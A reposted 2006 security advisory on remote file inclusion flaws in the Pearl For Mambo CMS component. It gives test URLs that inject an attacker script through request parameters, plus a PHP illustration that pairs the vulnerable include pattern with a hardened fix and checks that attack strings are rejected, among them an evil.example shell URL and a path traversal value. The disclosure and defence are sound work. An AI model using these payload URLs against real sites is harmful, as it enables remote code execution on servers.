[Repost] Pearl For Mambo Multiple Remote File Inclusion Vulnerabilities

Source: NSFOCUS (绿盟科技)

Published: 2006-06-27
Updated: 2006-06-27

Affected systems:
Pearlinger Pearl For Mambo <= 1.6
Description:
--------------------------------------------------------------------------------
Mambo is a free, feature-rich open-source content management system; Pearl For Mambo is a component that integrates seamlessly with Mambo.

Several Pearl For Mambo scripts use the value of the phpbb_root_path or GlobalSettings[templatesDirectory] request parameter, without validation, as the location of a file they include. A remote attacker can send a specially crafted URL that points the parameter at a file on a server under their control; the vulnerable script fetches and executes that file, allowing arbitrary code execution on the affected system in the context of the web server.

The following scripts are affected by this vulnerability:

includes/functions_cms.php
includes/adminSensored.php
includes/adminBoards.php
includes/adminAttachments.php
includes/adminAvatars.php
includes/adminBackupdatabase.php
includes/adminBanned.php
includes/adminForums.php
includes/adminPolls.php
includes/adminSmileys.php
includes/poll.php
includes/move.php

<* Source: Kw3rLn (ciriboflacs@YaHoo.Com)

   Link: http://www.milw0rm.com/exploits/1956
*>

Test method:
--------------------------------------------------------------------------------

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Users bear all risk of its use!

http://www.site.com/[path]/includes/functions_cms.php?phpbb_root_path=[evil_script]
http://www.site.com/[path]/includes/adminSensored.php?GlobalSettings[templatesDirectory]=[evil_script]
http://www.site.com/[path]/includes/adminBoards.php?GlobalSettings[templatesDirectory]=[evil_script]
http://www.site.com/[path]/includes/adminAttachments.php?GlobalSettings[templatesDirectory]=[evil_script]
http://www.site.com/[path]/includes/adminAvatars.php?GlobalSettings[templatesDirectory]=[evil_script]
http://www.site.com/[path]/includes/adminBackupdatabase.php?GlobalSettings[templatesDirectory]=[evil_script]
http://www.site.com/[path]/includes/adminBanned.php?GlobalSettings[templatesDirectory]=[evil_script]
http://www.site.com/[path]/includes/adminForums.php?GlobalSettings[templatesDirectory]=[evil_script]
http://www.site.com/[path]/includes/adminPolls.php?GlobalSettings[templatesDirectory]=[evil_script]
http://www.site.com/[path]/includes/adminSmileys.php?GlobalSettings[templatesDirectory]=[evil_script]
http://www.site.com/[path]/includes/poll.php?GlobalSettings[templatesDirectory]=[evil_script]
http://www.site.com/[path]/includes/move.php?GlobalSettings[templatesDirectory]=[evil_script]
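The URLs above work because each listed script uses the parameter value as the path of a file it includes. The PHP below is added here as an illustration; it is not code from Pearl For Mambo or from the original advisory. It shows the include pattern that produces this behaviour next to a hardened form, then runs the kind of attack values used in the test URLs through the hardened function to confirm they are rejected. The file names, function names and the PEARL_TEMPLATES_ROOT constant are assumptions chosen for the example.

```php
<?php
// Added example (not Pearl For Mambo's own code): the include pattern behind
// the remote-file-inclusion behaviour described in this advisory, beside a
// hardened form. File names, function names and PEARL_TEMPLATES_ROOT are
// assumptions made for the illustration.

// ---- Vulnerable shape -------------------------------------------------------
// With register_globals=On (Off by default since PHP 4.2.0, but required for
// this bug), a request such as
//   adminBoards.php?GlobalSettings[templatesDirectory]=http://evil.example/x
// creates $GlobalSettings = array('templatesDirectory' => 'http://evil.example/x')
// before the script body runs. If the script never initialises $GlobalSettings
// itself and later includes a file relative to it, include() fetches the remote
// file (allow_url_fopen is On by default) and executes it.
// The phpbb_root_path variant is the same shape with a plain variable, e.g.
//   include($phpbb_root_path . 'common.php');
// A trailing "?" in the attacker's value turns the appended 'common.php' into a
// query string on the attacker's server, so the attacker's file is what loads.
function vulnerable_template_file(array $GlobalSettings)
{
    // $GlobalSettings came straight from the request: attacker-controlled.
    return $GlobalSettings['templatesDirectory'] . '/header.php';
}
// include(vulnerable_template_file($GlobalSettings));   // vulnerable

// ---- Hardened shape ---------------------------------------------------------
// 1. The directory code is loaded from comes from server-side configuration,
//    never from request data.
// 2. The request may only choose a template *name*, limited to a safe
//    character set, and the resolved path must stay under the trusted root.
//    realpath() returns false for URLs and for paths that do not exist, so
//    remote locations and "../" escapes are both rejected.
function safe_template_file($templatesRoot, $requestedName)
{
    $root = realpath($templatesRoot);
    if ($root === false) {
        throw new RuntimeException('templates directory is not configured correctly');
    }
    // /D makes $ match only at the very end, so a trailing newline cannot sneak through.
    if (!preg_match('/^[A-Za-z0-9_-]+$/D', $requestedName)) {
        throw new InvalidArgumentException('invalid template name');
    }
    $candidate = realpath($root . DIRECTORY_SEPARATOR . $requestedName . '.php');
    $prefix = $root . DIRECTORY_SEPARATOR;
    if ($candidate === false || strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        throw new RuntimeException('template not found under the trusted directory');
    }
    return $candidate;
}

// Usage: the root is fixed at install time (assumed constant name); only the
// template name is taken from the request and it is validated before use.
//   define('PEARL_TEMPLATES_ROOT', dirname(__FILE__) . '/templates');
//   $name = isset($_GET['template']) ? $_GET['template'] : 'default';
//   include(safe_template_file(PEARL_TEMPLATES_ROOT, $name));

// Self-check in a scratch directory: one legitimate template is accepted,
// and each attack-style value (constructed for this example) is rejected
// before it could ever reach include().
define('PEARL_TEMPLATES_ROOT', sys_get_temp_dir() . '/pearl_templates_' . getmypid());
mkdir(PEARL_TEMPLATES_ROOT);
file_put_contents(PEARL_TEMPLATES_ROOT . '/default.php', "<?php // harmless template\n");

echo 'accepted: ' . safe_template_file(PEARL_TEMPLATES_ROOT, 'default') . "\n";

$attacks = array(
    'http://evil.example/shell.txt?',   // remote inclusion, as in the test URLs
    'ftp://evil.example/shell.txt',     // other URL wrappers are rejected the same way
    '../../../etc/passwd',              // directory traversal to a local file
    "default\n",                        // trailing newline, caught by the /D modifier
);
foreach ($attacks as $bad) {
    try {
        safe_template_file(PEARL_TEMPLATES_ROOT, $bad);
        echo 'FAIL: accepted ' . var_export($bad, true) . "\n";
    } catch (Exception $e) {
        echo 'rejected: ' . var_export($bad, true) . ' (' . $e->getMessage() . ")\n";
    }
}

unlink(PEARL_TEMPLATES_ROOT . '/default.php');
rmdir(PEARL_TEMPLATES_ROOT);
```

Two php.ini-level controls complement the code fix. Setting register_globals=Off removes the mechanism by which a request parameter becomes $GlobalSettings or $phpbb_root_path in the first place, and allow_url_fopen=Off stops include() from fetching URLs at all; on the PHP releases current when this advisory was published, those were the only configuration-level mitigations. PHP 5.2.0 later added allow_url_include (Off by default), which blocks include() and require() of URLs even where allow_url_fopen stays On for other file functions.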

Recommendation:
--------------------------------------------------------------------------------
Vendor patch:

Pearlinger
----------
The vendor has not yet released a patch or upgrade. Users of this software are advised to watch the vendor's home page for the latest version:

http://www.pearlinger.com/
